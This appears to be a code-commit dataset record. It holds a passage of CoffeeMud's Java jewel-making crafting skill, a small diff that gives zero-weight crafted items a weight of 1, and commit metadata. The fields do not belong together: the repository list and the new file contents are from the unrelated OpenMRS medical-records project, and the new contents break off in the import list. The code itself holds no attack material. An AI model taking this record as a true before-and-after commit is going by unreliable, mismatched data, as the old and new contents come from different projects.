} } super.unInvoke(); } @Override public boolean mayICraft(final Item I) { if(I==null) return false; if(!super.mayBeCrafted(I)) return false; if(CMLib.flags().isDeadlyOrMaliciousEffect(I)) return false; if((I.material()&RawMaterial.MATERIAL_MASK)==RawMaterial.MATERIAL_PRECIOUS) { if(I instanceof Rideable) { final Rideable R=(Rideable)I; final int rideType=R.rideBasis(); switch(rideType) { case Rideable.RIDEABLE_LADDER: case Rideable.RIDEABLE_SLEEP: case Rideable.RIDEABLE_SIT: case Rideable.RIDEABLE_TABLE: return true; default: return false; } } else if(I instanceof Armor) { if(I.fitsOn(Wearable.WORN_EARS) ||I.fitsOn(Wearable.WORN_EYES) ||I.fitsOn(Wearable.WORN_HEAD) ||I.fitsOn(Wearable.WORN_NECK) ||I.fitsOn(Wearable.WORN_FEET) ||I.fitsOn(Wearable.WORN_LEFT_FINGER) ||I.fitsOn(Wearable.WORN_RIGHT_FINGER) ||I.fitsOn(Wearable.WORN_LEFT_WRIST) ||I.fitsOn(Wearable.WORN_RIGHT_WRIST)) return true; return (isANativeItem(I.Name())); } if(I.rawProperLocationBitmap()==Wearable.WORN_HELD) return true; return true; } else if((I instanceof Armor) &&(((I.material()&RawMaterial.MATERIAL_MASK)==RawMaterial.MATERIAL_METAL) ||((I.material()&RawMaterial.MATERIAL_MASK)==RawMaterial.MATERIAL_MITHRIL))) { final Armor A=(Armor)I; if((CMath.bset(A.getLayerAttributes(), Armor.LAYERMASK_SEETHROUGH)) &&(A.basePhyStats().armor()<3)) return true; if((A.basePhyStats().armor()<2) &&(I.fitsOn(Wearable.WORN_EARS) ||I.fitsOn(Wearable.WORN_EYES) ||I.fitsOn(Wearable.WORN_HEAD) ||I.fitsOn(Wearable.WORN_NECK) ||I.fitsOn(Wearable.WORN_FEET) ||I.fitsOn(Wearable.WORN_LEFT_FINGER) ||I.fitsOn(Wearable.WORN_RIGHT_FINGER) ||I.fitsOn(Wearable.WORN_LEFT_WRIST) ||I.fitsOn(Wearable.WORN_RIGHT_WRIST))) return true; return (isANativeItem(I.Name())); } return (isANativeItem(I.Name())); } @Override public boolean supportsMending(final Physical I) { return canMend(null, I, true); } @Override protected boolean canMend(final MOB mob, final Environmental E, final boolean quiet) { if(!super.canMend(mob,E,quiet)) return false; if((!(E instanceof Item)) ||(!mayICraft((Item)E))) { if(!quiet) commonTell(mob,L("That's not an jewelworked item.")); return false; } return true; } @Override public String getDecodedComponentsDescription(final MOB mob, final List<String> recipe) { return super.getComponentDescription( mob, recipe, RCP_WOOD ); } @Override public boolean invoke(final MOB mob, final List<String> commands, final Physical givenTarget, final boolean auto, final int asLevel) { return autoGenInvoke(mob,commands,givenTarget,auto,asLevel,0,false,new Vector<Item>(0)); } @Override protected boolean autoGenInvoke(final MOB mob, final List<String> commands, final Physical givenTarget, final boolean auto, final int asLevel, final int autoGenerate, final boolean forceLevels, final List<Item> crafted) { final List<String> originalCommands = new XVector<String>(commands); if(super.checkStop(mob, commands)) return true; if(super.checkInfo(mob, commands)) return true; fireRequired=true; final PairVector<EnhancedExpertise,Integer> enhancedTypes=enhancedTypes(mob,commands); int recipeLevel = 1; randomRecipeFix(mob,addRecipes(mob,loadRecipes()),commands,autoGenerate); if(commands.size()==0) { commonTell(mob,L("Make what? Enter \"jewel list\" for a list. 
You may also enter jewel encrust <gem name> <item name>, " + "jewel mount <gem name> <item name>, jewel refit <item name>, jewel info <item>, jewel learn <item>, " + "jewel scan, jewel mend <item name>, or jewel stop to cancel.")); return false; } if((!auto) &&(commands.size()>0) &&((commands.get(0)).equalsIgnoreCase("bundle"))) { bundling=true; if(super.invoke(mob,commands,givenTarget,auto,asLevel)) return super.bundle(mob,commands); return false; } final List<List<String>> recipes=addRecipes(mob,loadRecipes()); final String str=commands.get(0); String startStr=null; fireRequired=true; bundling=false; int duration=4; String misctype=""; if(str.equalsIgnoreCase("list")) { String mask=CMParms.combine(commands,1); boolean allFlag=false; if(mask.equalsIgnoreCase("all")) { allFlag=true; mask=""; } int toggler=1; final int toggleTop=2; final StringBuffer buf=new StringBuffer(""); final int[] cols={ CMLib.lister().fixColWidth(27,mob.session()), CMLib.lister().fixColWidth(3,mob.session()), CMLib.lister().fixColWidth(5,mob.session()) }; for(int r=0;r<toggleTop;r++) buf.append((r>0?" ":"")+CMStrings.padRight(L("Item"),cols[0])+" "+CMStrings.padRight(L("Lvl"),cols[1])+" "+CMStrings.padRight(L("Metal"),cols[2])); buf.append("\n\r"); final List<List<String>> listRecipes=((mask.length()==0) || mask.equalsIgnoreCase("all")) ? recipes : super.matchingRecipeNames(recipes, mask, true); for(int r=0;r<listRecipes.size();r++) { final List<String> V=listRecipes.get(r); if(V.size()>0) { final String item=replacePercent(V.get(RCP_FINALNAME),""); final int level=CMath.s_int(V.get(RCP_LEVEL)); final String wood=getComponentDescription(mob,V,RCP_WOOD); if(wood.length()>5) { if(toggler>1) buf.append("\n\r"); toggler=toggleTop; } if((level<=xlevel(mob))||allFlag) { buf.append(CMStrings.padRight(item,cols[0])+" "+CMStrings.padRight(""+level,cols[1])+" "+CMStrings.padRightPreserve(""+wood,cols[2])+((toggler!=toggleTop)?" 
":"\n\r")); if(++toggler>toggleTop) toggler=1; } } } commonTell(mob,buf.toString()); enhanceList(mob); return true; } else if(((commands.get(0))).equalsIgnoreCase("learn")) { return doLearnRecipe(mob, commands, givenTarget, auto, asLevel); } else if((str.equalsIgnoreCase("encrust"))||(str.equalsIgnoreCase("mount"))) { final String word=str.toLowerCase(); if(commands.size()<3) { commonTell(mob,L("@x1 what jewel onto what item?",CMStrings.capitalizeAndLower(word))); return false; } final Item fire=getRequiredFire(mob,autoGenerate); buildingI=null; activity = CraftingActivity.CRAFTING; aborted=false; messedUp=false; if(fire==null) return false; final String jewel=commands.get(1); final String rest=CMParms.combine(commands,2); final Environmental jewelE=mob.location().fetchFromMOBRoomFavorsItems(mob,null,jewel,Wearable.FILTER_UNWORNONLY); final Environmental thangE=mob.location().fetchFromMOBRoomFavorsItems(mob,null,rest,Wearable.FILTER_UNWORNONLY); if((jewelE==null)||(!CMLib.flags().canBeSeenBy(jewelE,mob))) { commonTell(mob,L("You don't see any '@x1' here.",jewel)); return false; } if((thangE==null)||(!CMLib.flags().canBeSeenBy(thangE,mob))) { commonTell(mob,L("You don't see any '@x1' here.",rest)); return false; } if((!(jewelE instanceof RawMaterial))||(!(jewelE instanceof Item)) ||(((((Item)jewelE).material()&RawMaterial.MATERIAL_MASK)!=RawMaterial.MATERIAL_PRECIOUS) &&((((Item)jewelE).material()&RawMaterial.MATERIAL_MASK)!=RawMaterial.MATERIAL_GLASS))) { commonTell(mob,L("A @x1 is not suitable to @x2 on anything.",jewelE.name(),word)); return false; } final Item jewelI=(Item)CMLib.materials().unbundle((Item)jewelE,1,null); if(jewelI==null) { commonTell(mob,L("@x1 is not pure enough to be @x2ed with. You will need to use a gathered one.",jewelE.name(),word)); return false; } if((!(thangE instanceof Item)) ||(!thangE.isGeneric()) ||(((((Item)thangE).material()&RawMaterial.MATERIAL_MASK)!=RawMaterial.MATERIAL_CLOTH) &&((((Item)thangE).material()&RawMaterial.MATERIAL_MASK)!=RawMaterial.MATERIAL_METAL) &&((((Item)thangE).material()&RawMaterial.MATERIAL_MASK)!=RawMaterial.MATERIAL_MITHRIL) &&((((Item)thangE).material()&RawMaterial.MATERIAL_MASK)!=RawMaterial.MATERIAL_SYNTHETIC) &&((((Item)thangE).material()&RawMaterial.MATERIAL_MASK)!=RawMaterial.MATERIAL_ROCK) &&((((Item)thangE).material()&RawMaterial.MATERIAL_MASK)!=RawMaterial.MATERIAL_WOODEN) &&((((Item)thangE).material()&RawMaterial.MATERIAL_MASK)!=RawMaterial.MATERIAL_LEATHER))) { commonTell(mob,L("A @x1 is not suitable to be @x2ed on.",thangE.name(),word)); return false; } if(!super.invoke(mob,commands,givenTarget,auto,asLevel)) return false; buildingI=(Item)thangE; beingDone=new Pair<Item,String>(null,""); String materialName=RawMaterial.CODES.NAME(jewelI.material()).toLowerCase(); if(word.equals("encrust")) { beingDone.second = (CMStrings.capitalizeAndLower(buildingI.name())+" is encrusted with bits of "+materialName+"."); startStr=L("<S-NAME> start(s) encrusting @x1 with @x2.",buildingI.name(),materialName); displayText=L("You are encrusting @x1 with @x2",buildingI.name(),materialName); verb=L("encrusting @x1 with bits of @x2",buildingI.name(),materialName); } else { materialName=CMLib.english().startWithAorAn(materialName).toLowerCase(); beingDone.second = (CMStrings.capitalizeAndLower(buildingI.name())+" has "+materialName+" mounted on it."); startStr=L("<S-NAME> start(s) mounting @x1 onto @x2.",materialName,buildingI.name()); displayText=L("You are mounting @x1 onto @x2",materialName,buildingI.name()); verb=L("mounting @x1 onto 
@x2",materialName,buildingI.name()); } beingDone.first = jewelI; messedUp=!proficiencyCheck(mob,0,auto); duration=10; final CMMsg msg=CMClass.getMsg(mob,null,this,getActivityMessageType(),startStr); if(mob.location().okMessage(mob,msg)) { jewelI.destroy(); mob.location().send(mob,msg); beneficialAffect(mob,mob,asLevel,duration); return true; } return false; } if(str.equalsIgnoreCase("scan")) return publicScan(mob,commands); else if(str.equalsIgnoreCase("mend")) { buildingI=null; activity = CraftingActivity.CRAFTING; messedUp=false; final Item fire=getRequiredFire(mob,autoGenerate); if(fire==null) return false; final Vector<String> newCommands=CMParms.parse(CMParms.combine(commands,1)); buildingI=getTargetItemFavorMOB(mob,mob.location(),givenTarget,newCommands,Wearable.FILTER_UNWORNONLY); if(!canMend(mob, buildingI,false)) return false; activity = CraftingActivity.MENDING; if(!super.invoke(mob,commands,givenTarget,auto,asLevel)) return false; startStr=L("<S-NAME> start(s) mending @x1.",buildingI.name()); displayText=L("You are mending @x1",buildingI.name()); verb=L("mending @x1",buildingI.name()); } else if(str.equalsIgnoreCase("refit")) { buildingI=null; activity = CraftingActivity.CRAFTING; messedUp=false; final Item fire=getRequiredFire(mob,autoGenerate); if(fire==null) return false; final Vector<String> newCommands=CMParms.parse(CMParms.combine(commands,1)); buildingI=getTargetItemFavorMOB(mob,mob.location(),givenTarget,newCommands,Wearable.FILTER_UNWORNONLY); if(buildingI==null) return false; if(!mayICraft(mob,buildingI)) return false; if(buildingI.phyStats().height()==0) { commonTell(mob,L("@x1 is already the right size.",buildingI.name(mob))); return false; } activity = CraftingActivity.REFITTING; if(!super.invoke(mob,commands,givenTarget,auto,asLevel)) return false; startStr=L("<S-NAME> start(s) refitting @x1.",buildingI.name()); displayText=L("You are refitting @x1",buildingI.name()); verb=L("refitting @x1",buildingI.name()); } else { beingDone=null; buildingI=null; activity = CraftingActivity.CRAFTING; aborted=false; messedUp=false; String statue=null; if((commands.size()>1)&&(commands.get(commands.size()-1)).startsWith("STATUE=")) { statue=((commands.get(commands.size()-1)).substring(7)).trim(); if(statue.length()==0) statue=null; else commands.remove(commands.size()-1); } int amount=-1; if((commands.size()>1)&&(CMath.isNumber(commands.get(commands.size()-1)))) { amount=CMath.s_int(commands.get(commands.size()-1)); commands.remove(commands.size()-1); } final String recipeName=CMParms.combine(commands,0); List<String> foundRecipe=null; final List<List<String>> matches=matchingRecipeNames(recipes,recipeName,true); for(int r=0;r<matches.size();r++) { final List<String> V=matches.get(r); if(V.size()>0) { final int level=CMath.s_int(V.get(RCP_LEVEL)); if((autoGenerate>0)||(level<=xlevel(mob))) { foundRecipe=V; recipeLevel=level; break; } } } if(foundRecipe==null) { commonTell(mob,L("You don't know how to make a '@x1'. 
Try \"jewel list\" for a list.",recipeName)); return false; } misctype=foundRecipe.get(RCP_MISCTYPE); bundling=misctype.equalsIgnoreCase("BUNDLE"); if(!bundling) { final Item fire=getRequiredFire(mob,autoGenerate); if(fire==null) return false; } else fireRequired=false; final String woodRequiredStr = foundRecipe.get(RCP_WOOD); final int[] compData = new int[CF_TOTAL]; final String realRecipeName=replacePercent(foundRecipe.get(RCP_FINALNAME),""); final List<Object> componentsFoundList=getAbilityComponents(mob, woodRequiredStr, "make "+CMLib.english().startWithAorAn(realRecipeName),autoGenerate,compData,1); if(componentsFoundList==null) return false; int woodRequired=CMath.s_int(woodRequiredStr); woodRequired=adjustWoodRequired(woodRequired,mob); if(amount>woodRequired) woodRequired=amount; final String otherRequired=foundRecipe.get(RCP_EXTRAREQ); final int[] pm={RawMaterial.MATERIAL_MITHRIL,RawMaterial.MATERIAL_METAL}; final int[][] data=fetchFoundResourceData(mob, woodRequired,"metal",pm, otherRequired.length()>0?1:0,otherRequired,null, false, autoGenerate, enhancedTypes); if(data==null) return false; fixDataForComponents(data,woodRequiredStr,(autoGenerate>0) && (woodRequired==0),componentsFoundList, 1); woodRequired=data[0][FOUND_AMT]; final Session session=mob.session(); if((misctype.equalsIgnoreCase("statue")) &&(session!=null) &&((statue==null)||(statue.trim().length()==0))) { final Ability me=this; final Physical target=givenTarget; if(autoGenerate>0) statue=mob.Name(); else session.prompt(new InputCallback(InputCallback.Type.PROMPT,"",0) { @Override public void showPrompt() { session.promptPrint(L("What is this item a representation of?\n\r: ")); } @Override public void timedOut() { } @Override public void callBack() { final String of=this.input; if((of.trim().length()==0)||(of.indexOf('<')>=0)) return; final Vector<String> newCommands=new XVector<String>(originalCommands); newCommands.add("STATUE="+of); me.invoke(mob, newCommands, target, auto, asLevel); } }); return false; } if(!super.invoke(mob,commands,givenTarget,auto,asLevel)) return false; final MaterialLibrary.DeadResourceRecord deadMats; if((componentsFoundList.size() > 0)||(autoGenerate>0)) deadMats = new MaterialLibrary.DeadResourceRecord(); else deadMats = CMLib.materials().destroyResources(mob.location(),woodRequired,data[0][FOUND_CODE],data[1][FOUND_CODE],null,null); final MaterialLibrary.DeadResourceRecord deadComps = CMLib.ableComponents().destroyAbilityComponents(componentsFoundList); final int lostValue=autoGenerate>0?0:(deadMats.lostValue + deadComps.lostValue); buildingI=CMClass.getItem(foundRecipe.get(RCP_CLASSTYPE)); if(buildingI==null) { commonTell(mob,L("There's no such thing as a @x1!!!",foundRecipe.get(RCP_CLASSTYPE))); return false; } duration=getDuration(CMath.s_int(foundRecipe.get(RCP_TICKS)),mob,CMath.s_int(foundRecipe.get(RCP_LEVEL)),4); String itemName=null; buildingI.setMaterial(getBuildingMaterial(woodRequired,data,compData)); if((otherRequired.length()>0)&&(otherRequired.equalsIgnoreCase("PRECIOUS"))) itemName=replacePercent(foundRecipe.get(RCP_FINALNAME),RawMaterial.CODES.NAME((data[1][FOUND_CODE]))).toLowerCase(); else itemName=determineFinalName(foundRecipe.get(RCP_FINALNAME),buildingI.material(),deadMats,deadComps); if(bundling) itemName="a "+woodRequired+"# "+itemName; else if(!CMLib.english().startsWithAnArticle(itemName)) itemName=CMLib.english().startWithAorAn(itemName); buildingI.setName(itemName); startStr=L("<S-NAME> start(s) making @x1.",buildingI.name()); displayText=L("You are making 
@x1",buildingI.name()); verb=L("making @x1",buildingI.name()); playSound="tinktinktink.wav"; buildingI.setDisplayText(L("@x1 lies here",itemName)); if((data[1][FOUND_CODE]>0) &&(((data[0][FOUND_CODE]&RawMaterial.MATERIAL_MASK)==RawMaterial.MATERIAL_METAL) ||((data[0][FOUND_CODE]&RawMaterial.MATERIAL_MASK)==RawMaterial.MATERIAL_MITHRIL)) &&(((data[1][FOUND_CODE]&RawMaterial.MATERIAL_MASK)==RawMaterial.MATERIAL_PRECIOUS))) buildingI.setDescription(L("@x1 made of @x2.",itemName,RawMaterial.CODES.NAME(data[0][FOUND_CODE]).toLowerCase())); else buildingI.setDescription(itemName+". "); buildingI.basePhyStats().setWeight(getStandardWeight(woodRequired+compData[CF_AMOUNT],bundling)); buildingI.setBaseValue(CMath.s_int(foundRecipe.get(RCP_VALUE))+(woodRequired*(RawMaterial.CODES.VALUE(data[0][FOUND_CODE])))); setBrand(mob, buildingI); if((buildingI.material()!=data[1][FOUND_CODE]) &&((data[1][FOUND_CODE]&RawMaterial.MATERIAL_MASK)>0)) buildingI.setBaseValue(buildingI.baseGoldValue()+RawMaterial.CODES.VALUE(data[1][FOUND_CODE])); buildingI.basePhyStats().setLevel(CMath.s_int(foundRecipe.get(RCP_LEVEL))); //int capacity=CMath.s_int((String)foundRecipe.get(RCP_CAPACITY)); final int armordmg=CMath.s_int(foundRecipe.get(RCP_ARMORDMG)); final String spell=(foundRecipe.size()>RCP_SPELL)?foundRecipe.get(RCP_SPELL).trim():""; addSpells(buildingI,spell,deadMats.lostProps,deadComps.lostProps); if((buildingI instanceof Armor)&&(!(buildingI instanceof FalseLimb))) { ((Armor)buildingI).basePhyStats().setArmor(0); if(armordmg!=0) ((Armor)buildingI).basePhyStats().setArmor(armordmg); setWearLocation(buildingI,misctype,0); } if(buildingI.ID().endsWith("Dice")) { buildingI.basePhyStats().setAbility(armordmg); } if((misctype.equalsIgnoreCase("statue")) &&(statue!=null) &&(statue.trim().length()>0)) { buildingI.setName(L("@x1 of @x2",itemName,statue.trim())); buildingI.setDisplayText(L("@x1 of @x2 is here",itemName,statue.trim())); buildingI.setDescription(L("@x1 of @x2. ",itemName,statue.trim())); } if(bundling) buildingI.setBaseValue(lostValue); buildingI.recoverPhyStats(); buildingI.text(); buildingI.recoverPhyStats(); } messedUp=!proficiencyCheck(mob,0,auto); if(bundling) { messedUp=false; duration=1; verb=L("bundling @x1",RawMaterial.CODES.NAME(buildingI.material()).toLowerCase()); startStr=L("<S-NAME> start(s) @x1.",verb); displayText=L("You are @x1",verb); } if(autoGenerate>0) { crafted.add(buildingI); return true; } final CMMsg msg=CMClass.getMsg(mob,buildingI,getActivityMessageType(),startStr); if(mob.location().okMessage(mob,msg)) { mob.location().send(mob,msg); buildingI=(Item)msg.target(); beneficialAffect(mob,mob,asLevel,duration); enhanceItem(mob,buildingI,recipeLevel,enhancedTypes); return true; } else if(bundling) { messedUp=false; aborted=false; unInvoke(); } return false; } }
message: jewelmaking tweek for 0 weight items. git-svn-id: 0cdf8356e41b2d8ccbb41bb76c82068fe80b2514@17337 0d6f1817-ed0e-0410-87c9-987e46238f29
old_file: com/planet_ink/coffee_mud/Abilities/Common/JewelMaking.java
subject: jewelmaking tweek for 0 weight items.
git_diff:
<ide><path>om/planet_ink/coffee_mud/Abilities/Common/JewelMaking.java <ide> else <ide> buildingI.setDescription(itemName+". "); <ide> buildingI.basePhyStats().setWeight(getStandardWeight(woodRequired+compData[CF_AMOUNT],bundling)); <del> buildingI.setBaseValue(CMath.s_int(foundRecipe.get(RCP_VALUE))+(woodRequired*(RawMaterial.CODES.VALUE(data[0][FOUND_CODE])))); <add> if(buildingI.basePhyStats().weight()<=0) <add> buildingI.basePhyStats().setWeight(1); <add> final int valueAdjust = (woodRequired*(RawMaterial.CODES.VALUE(data[0][FOUND_CODE]))); <add> buildingI.setBaseValue(CMath.s_int(foundRecipe.get(RCP_VALUE))+valueAdjust); <ide> setBrand(mob, buildingI); <ide> if((buildingI.material()!=data[1][FOUND_CODE]) <ide> &&((data[1][FOUND_CODE]&RawMaterial.MATERIAL_MASK)>0))
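The git_diff value above does not use standard unified-diff prefixes; hunk lines carry <ide>, <add>, and <del> markers instead. Below is a small sketch of converting that markup back into unified-diff prefixes, under the assumption (inferred from this row) that <ide> marks unchanged context, <add> marks added lines, and <del> marks removed lines.

```python
# Sketch: convert the tagged diff markup seen in the git_diff field into
# conventional unified-diff prefixes. The tag meanings (<ide> = context,
# <add> = added, <del> = removed) are inferred from the example row above.
import re

PREFIX = {"ide": " ", "add": "+", "del": "-"}

def tagged_to_unified(tagged: str) -> str:
    lines = []
    # Capture each tag and the text running up to the next tag (or end of string).
    for tag, body in re.findall(r"<(ide|add|del)>(.*?)(?=<(?:ide|add|del)>|\Z)",
                                tagged, flags=re.S):
        lines.append(PREFIX[tag] + body.strip("\n"))
    return "\n".join(lines)

# Abbreviated example with the same shape as the row above:
sample = "<ide><path>JewelMaking.java <del> old setBaseValue line <add> new weight check"
print(tagged_to_unified(sample))
```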
lang: Java
license: mpl-2.0
commit: 2cead7a7949d3ab4f95768ec7590e348f3cccab8
returncode: 0
repos:
asifur77/openmrs,lbl52001/openmrs-core,ssmusoke/openmrs-core,sravanthi17/openmrs-core,jembi/openmrs-core,spereverziev/openmrs-core,alexwind26/openmrs-core,iLoop2/openmrs-core,aboutdata/openmrs-core,kckc/openmrs-core,andyvand/OpenMRS,milankarunarathne/openmrs-core,jembi/openmrs-core,jembi/openmrs-core,Ch3ck/openmrs-core,donaldgavis/openmrs-core,AbhijitParate/openmrs-core,donaldgavis/openmrs-core,sravanthi17/openmrs-core,geoff-wasilwa/openmrs-core,geoff-wasilwa/openmrs-core,asifur77/openmrs,Winbobob/openmrs-core,preethi29/openmrs-core,WANeves/openmrs-core,geoff-wasilwa/openmrs-core,AbhijitParate/openmrs-core,kckc/openmrs-core,dcmul/openmrs-core,spereverziev/openmrs-core,spereverziev/openmrs-core,Ch3ck/openmrs-core,ern2/openmrs-core,aboutdata/openmrs-core,jembi/openmrs-core,sravanthi17/openmrs-core,maany/openmrs-core,vinayvenu/openmrs-core,kabariyamilind/openMRSDEV,nilusi/Legacy-UI,shiangree/openmrs-core,lbl52001/openmrs-core,hoquangtruong/TestMylyn,aboutdata/openmrs-core,jamesfeshner/openmrs-module,maany/openmrs-core,michaelhofer/openmrs-core,pselle/openmrs-core,trsorsimoII/openmrs-core,foolchan2556/openmrs-core,macorrales/openmrs-core,jvena1/openmrs-core,sadhanvejella/openmrs,MuhammadSafwan/Stop-Button-Ability,iLoop2/openmrs-core,Openmrs-joel/openmrs-core,aj-jaswanth/openmrs-core,pselle/openmrs-core,sintjuri/openmrs-core,jvena1/openmrs-core,aj-jaswanth/openmrs-core,maekstr/openmrs-core,lilo2k/openmrs-core,dcmul/openmrs-core,ssmusoke/openmrs-core,jcantu1988/openmrs-core,kigsmtua/openmrs-core,koskedk/openmrs-core,naraink/openmrs-core,prisamuel/openmrs-core,alexei-grigoriev/openmrs-core,kristopherschmidt/openmrs-core,andyvand/OpenMRS,sintjuri/openmrs-core,spereverziev/openmrs-core,jamesfeshner/openmrs-module,ldf92/openmrs-core,macorrales/openmrs-core,siddharthkhabia/openmrs-core,donaldgavis/openmrs-core,preethi29/openmrs-core,ssmusoke/openmrs-core,sadhanvejella/openmrs,Winbobob/openmrs-core,Ch3ck/openmrs-core,nilusi/Legacy-UI,vinayvenu/openmrs-core,AbhijitParate/openmrs-core,rbtracker/openmrs-core,macorrales/openmrs-core,Winbobob/openmrs-core,joansmith/openmrs-core,pselle/openmrs-core,ldf92/openmrs-core,MuhammadSafwan/Stop-Button-Ability,kckc/openmrs-core,kristopherschmidt/openmrs-core,AbhijitParate/openmrs-core,geoff-wasilwa/openmrs-core,trsorsimoII/openmrs-core,ern2/openmrs-core,maekstr/openmrs-core,naraink/openmrs-core,shiangree/openmrs-core,dlahn/openmrs-core,kabariyamilind/openMRSDEV,aj-jaswanth/openmrs-core,michaelhofer/openmrs-core,Negatu/openmrs-core,vinayvenu/openmrs-core,andyvand/OpenMRS,alexei-grigoriev/openmrs-core,lbl52001/openmrs-core,lbl52001/openmrs-core,ldf92/openmrs-core,Openmrs-joel/openmrs-core,shiangree/openmrs-core,andyvand/OpenMRS,kigsmtua/openmrs-core,asifur77/openmrs,pselle/openmrs-core,donaldgavis/openmrs-core,sintjuri/openmrs-core,koskedk/openmrs-core,nilusi/Legacy-UI,ern2/openmrs-core,Negatu/openmrs-core,ern2/openmrs-core,alexwind26/openmrs-core,siddharthkhabia/openmrs-core,WANeves/openmrs-core,kabariyamilind/openMRSDEV,foolchan2556/openmrs-core,siddharthkhabia/openmrs-core,iLoop2/openmrs-core,WANeves/openmrs-core,koskedk/openmrs-core,sintjuri/openmrs-core,geoff-wasilwa/openmrs-core,dlahn/openmrs-core,siddharthkhabia/openmrs-core,MitchellBot/openmrs-core,MuhammadSafwan/Stop-Button-Ability,chethandeshpande/openmrs-core,sravanthi17/openmrs-core,iLoop2/openmrs-core,alexwind26/openmrs-core,sintjuri/openmrs-core,Openmrs-joel/openmrs-core,shiangree/openmrs-core,ssmusoke/openmrs-core,prisamuel/openmrs-core,shiangree/openmrs-core,WANeves/openmrs-core,MitchellBot/openmrs-core
,prisamuel/openmrs-core,WANeves/openmrs-core,siddharthkhabia/openmrs-core,spereverziev/openmrs-core,chethandeshpande/openmrs-core,jvena1/openmrs-core,alexwind26/openmrs-core,alexei-grigoriev/openmrs-core,asifur77/openmrs,trsorsimoII/openmrs-core,foolchan2556/openmrs-core,kckc/openmrs-core,kigsmtua/openmrs-core,andyvand/OpenMRS,Ch3ck/openmrs-core,maekstr/openmrs-core,sadhanvejella/openmrs,maany/openmrs-core,aboutdata/openmrs-core,pselle/openmrs-core,alexei-grigoriev/openmrs-core,dlahn/openmrs-core,aboutdata/openmrs-core,MuhammadSafwan/Stop-Button-Ability,vinayvenu/openmrs-core,hoquangtruong/TestMylyn,asifur77/openmrs,nilusi/Legacy-UI,hoquangtruong/TestMylyn,iLoop2/openmrs-core,prisamuel/openmrs-core,milankarunarathne/openmrs-core,kigsmtua/openmrs-core,maekstr/openmrs-core,chethandeshpande/openmrs-core,kigsmtua/openmrs-core,jvena1/openmrs-core,naraink/openmrs-core,milankarunarathne/openmrs-core,MuhammadSafwan/Stop-Button-Ability,dlahn/openmrs-core,jcantu1988/openmrs-core,nilusi/Legacy-UI,andyvand/OpenMRS,sadhanvejella/openmrs,preethi29/openmrs-core,jcantu1988/openmrs-core,foolchan2556/openmrs-core,milankarunarathne/openmrs-core,donaldgavis/openmrs-core,trsorsimoII/openmrs-core,maany/openmrs-core,dcmul/openmrs-core,vinayvenu/openmrs-core,sadhanvejella/openmrs,Negatu/openmrs-core,aj-jaswanth/openmrs-core,MitchellBot/openmrs-core,kristopherschmidt/openmrs-core,jembi/openmrs-core,WANeves/openmrs-core,jcantu1988/openmrs-core,prisamuel/openmrs-core,iLoop2/openmrs-core,AbhijitParate/openmrs-core,kckc/openmrs-core,koskedk/openmrs-core,jcantu1988/openmrs-core,lilo2k/openmrs-core,rbtracker/openmrs-core,lilo2k/openmrs-core,hoquangtruong/TestMylyn,MitchellBot/openmrs-core,maekstr/openmrs-core,milankarunarathne/openmrs-core,aj-jaswanth/openmrs-core,rbtracker/openmrs-core,alexwind26/openmrs-core,rbtracker/openmrs-core,Winbobob/openmrs-core,joansmith/openmrs-core,Winbobob/openmrs-core,lbl52001/openmrs-core,naraink/openmrs-core,chethandeshpande/openmrs-core,shiangree/openmrs-core,Negatu/openmrs-core,lilo2k/openmrs-core,naraink/openmrs-core,jvena1/openmrs-core,macorrales/openmrs-core,joansmith/openmrs-core,kabariyamilind/openMRSDEV,AbhijitParate/openmrs-core,dcmul/openmrs-core,michaelhofer/openmrs-core,hoquangtruong/TestMylyn,jamesfeshner/openmrs-module,spereverziev/openmrs-core,siddharthkhabia/openmrs-core,sadhanvejella/openmrs,alexei-grigoriev/openmrs-core,Ch3ck/openmrs-core,ern2/openmrs-core,pselle/openmrs-core,aboutdata/openmrs-core,trsorsimoII/openmrs-core,Negatu/openmrs-core,ssmusoke/openmrs-core,jamesfeshner/openmrs-module,macorrales/openmrs-core,preethi29/openmrs-core,kabariyamilind/openMRSDEV,joansmith/openmrs-core,MitchellBot/openmrs-core,lbl52001/openmrs-core,dcmul/openmrs-core,prisamuel/openmrs-core,milankarunarathne/openmrs-core,chethandeshpande/openmrs-core,alexei-grigoriev/openmrs-core,lilo2k/openmrs-core,maany/openmrs-core,hoquangtruong/TestMylyn,sravanthi17/openmrs-core,kigsmtua/openmrs-core,nilusi/Legacy-UI,preethi29/openmrs-core,koskedk/openmrs-core,naraink/openmrs-core,koskedk/openmrs-core,joansmith/openmrs-core,ldf92/openmrs-core,sintjuri/openmrs-core,Winbobob/openmrs-core,rbtracker/openmrs-core,Openmrs-joel/openmrs-core,jembi/openmrs-core,michaelhofer/openmrs-core,Openmrs-joel/openmrs-core,Negatu/openmrs-core,michaelhofer/openmrs-core,kckc/openmrs-core,jamesfeshner/openmrs-module,ldf92/openmrs-core,dlahn/openmrs-core,lilo2k/openmrs-core,dcmul/openmrs-core,MuhammadSafwan/Stop-Button-Ability,maekstr/openmrs-core,foolchan2556/openmrs-core,kristopherschmidt/openmrs-core,kristopherschmidt/ope
nmrs-core,foolchan2556/openmrs-core
new_contents:
/** * The contents of this file are subject to the OpenMRS Public License * Version 1.0 (the "License"); you may not use this file except in * compliance with the License. You may obtain a copy of the License at * http://license.openmrs.org * * Software distributed under the License is distributed on an "AS IS" * basis, WITHOUT WARRANTY OF ANY KIND, either express or implied. See the * License for the specific language governing rights and limitations * under the License. * * Copyright (C) OpenMRS, LLC. All Rights Reserved. */ package org.openmrs.api.impl; import java.io.StringWriter; import java.io.UnsupportedEncodingException; import java.net.InetAddress; import java.net.UnknownHostException; import java.text.SimpleDateFormat; import java.util.ArrayList; import java.util.Calendar; import java.util.Collection; import java.util.HashMap; import java.util.HashSet; import java.util.LinkedHashMap; import java.util.LinkedHashSet; import java.util.List; import java.util.Locale; import java.util.Map; import java.util.Properties; import java.util.Set; import java.util.SortedMap; import java.util.TreeMap; import org.apache.commons.logging.Log; import org.apache.commons.logging.LogFactory; import org.openmrs.Concept; import org.openmrs.ConceptClass; import org.openmrs.ConceptDatatype; import org.openmrs.ConceptProposal; import org.openmrs.ConceptSource; import org.openmrs.EncounterType; import org.openmrs.FieldType; import org.openmrs.GlobalProperty; import org.openmrs.ImplementationId; import org.openmrs.Location; import org.openmrs.MimeType; import org.openmrs.OpenmrsObject; import org.openmrs.PatientIdentifierType; import org.openmrs.Privilege; import org.openmrs.Role; import org.openmrs.Tribe; import org.openmrs.User; import org.openmrs.api.APIAuthenticationException; import org.openmrs.api.APIException; import org.openmrs.api.AdministrationService; import org.openmrs.api.EventListeners; import org.openmrs.api.GlobalPropertyListener; import org.openmrs.api.context.Context; import 